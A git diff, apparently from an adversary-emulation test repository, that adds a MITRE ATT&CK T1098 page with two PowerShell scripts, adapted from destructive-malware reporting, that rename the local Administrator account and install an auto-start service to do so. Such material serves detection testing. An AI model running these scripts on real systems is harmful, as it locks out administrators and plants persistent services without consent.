diff --git a/ARTifacts/Chain_Reactions/chain_reaction_02.bat b/ARTifacts/Chain_Reactions/chain_reaction_Fission.bat
similarity index 100%
rename from ARTifacts/Chain_Reactions/chain_reaction_02.bat
rename to ARTifacts/Chain_Reactions/chain_reaction_Fission.bat
diff --git a/ARTifacts/Chain_Reactions/chain_reaction_01.bat b/ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat
similarity index 100%
rename from ARTifacts/Chain_Reactions/chain_reaction_01.bat
rename to ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat
diff --git a/Windows/Credential_Access/Account_Manipulation.md b/Windows/Credential_Access/Account_Manipulation.md
new file mode 100644
index 00000000..98dffc9c
--- /dev/null
+++ b/Windows/Credential_Access/Account_Manipulation.md
@@ -0,0 +1,62 @@
+# Account Manipulation
+
+MITRE ATT&CK Technique: [T1098](https://attack.mitre.org/wiki/Technique/T1098)
+
+Adapted from [Operation Blockbuster](https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf)
+
+## Example 1
+
+If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 16 digits.
+
+ $x = Get-Random -Minimum 2 -Maximum 9999
+ $y = Get-Random -Minimum 2 -Maximum 9999
+ $z = Get-Random -Minimum 2 -Maximum 9999
+ $w = Get-Random -Minimum 2 -Maximum 9999
+ Write-Host HaHaHa_$x$y$z$w
+
+ $hostname = (Get-CIMInstance CIM_ComputerSystem).Name
+
+ $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
+
+ foreach($member in $fmm) {
+ if($member -like "*Administrator*") {
+ Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
+ Write-Host "Successfully Renamed Administrator Account on" $hostname
+ }
+ }
+
+## Example 2
+
+If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 8 digits.
+
+ $x = Get-Random -Minimum 2 -Maximum 99
+ $y = Get-Random -Minimum 2 -Maximum 99
+ $z = Get-Random -Minimum 2 -Maximum 99
+ $w = Get-Random -Minimum 2 -Maximum 99
+ $newadmin = "HaHaHa_$x$y$z$w".ToString()
+
+ $serviceName = "Rename Account Service"
+ $serviceDisplayName = "Rename Account Service"
+ $serviceDescription = "Rename Account Service"
+ $serviceExecutable = "wmic useraccount where name='Administrator' rename '$newadmin'"
+
+ if (Get-Service $serviceName -ErrorAction SilentlyContinue)
+ {
+ $serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'"
+ $serviceToRemove | Stop-Service
+ $serviceToRemove.delete()
+ }
+ else
+ {
+ "service does not exists"
+ }
+
+ Write-Host "Installing service: $serviceName"
+ New-Service -name $serviceName -displayName $serviceDisplayName -binaryPathName $serviceExecutable -startupType Automatic -Description $serviceDescription
+ Write-Host "Installation completed: $serviceName"
+
+ Write-Host "Trying to start new service: $serviceName"
+
+ $serviceToStart = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'"
+ $serviceToStart.startservice()
+ Write-Host "Service started: $serviceName"
diff --git a/Windows/README.md b/Windows/README.md
index 10ecdf59..35762144 100644
--- a/Windows/README.md
+++ b/Windows/README.md
@@ -2,7 +2,7 @@
 | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
 |-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
-| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port |
+| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](/Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port |
 | [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media |
 | [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | [Clipboard Data](Collection/Clipboard_Data.md) | Data Encrypted | Connection Proxy |
 | Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |